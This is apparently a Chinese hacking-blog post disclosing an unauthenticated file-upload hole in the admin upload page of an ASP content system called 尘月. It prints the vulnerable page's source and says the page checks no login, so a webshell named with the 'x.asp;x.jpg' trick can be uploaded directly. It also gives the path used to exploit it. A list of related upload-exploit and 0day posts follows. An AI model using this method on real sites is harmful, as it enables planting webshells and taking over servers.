From:http://www.st999.cn/blog 久久久电脑工作室
源码:
<%
lang=trim(request("case"))
%>
<html>
<head>
<meta http-equiv="Content-Language" content="zh-cn">
<meta name="GENERATOR" content="Microsoft FrontPage 6.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>上传页面</title>
</head>
<body topmargin="0" leftmargin="0" bgcolor="#D6E0EF">
<form method="POST" action="admin_upcl1.asp?case=<%=lang%>" name="form3" enctype="multipart/form-data">
<input name="strPhoto" type="file" id="strPhoto" size="12">
<input type="submit" value="上传预览图片" name="B1"></p>
</form>
</body>
</html>
没有验证用户,可以直接访问,上传格式为x.asp;x.jpg的大马就可以了。。。
只验证本版本,,没有对尘月其他系统版本进行测试。
利用语句:http://127.0.0.1:99/Admin_Cy/adm_uplo1.asp?case=pic1
只显示10条记录相关文章
upfile 又一奇迹般的突破 (浏览: 8330, 评论: 0)
无忧购物系统ASP通用版 V2010.9.17 ---- 上传漏洞 (浏览: 10158, 评论: 0)
无忧购物系统ASP时尚版上传漏洞 (浏览: 10088, 评论: 0)
深度学习asp整站系统oday (浏览: 8666, 评论: 0)
微尔文章系统v1.51 (修正版)上传漏洞 (浏览: 10682, 评论: 0)
Es_Cms上传漏洞利用 (浏览: 9477, 评论: 0)
良精微博系统上传漏洞 (浏览: 12715, 评论: 0)
一个上传文件的分析笔记 (浏览: 10563, 评论: 0)
上传漏洞hidden to text 突破手记 (浏览: 11182, 评论: 0)
Trackbacks
 |
 |
 |
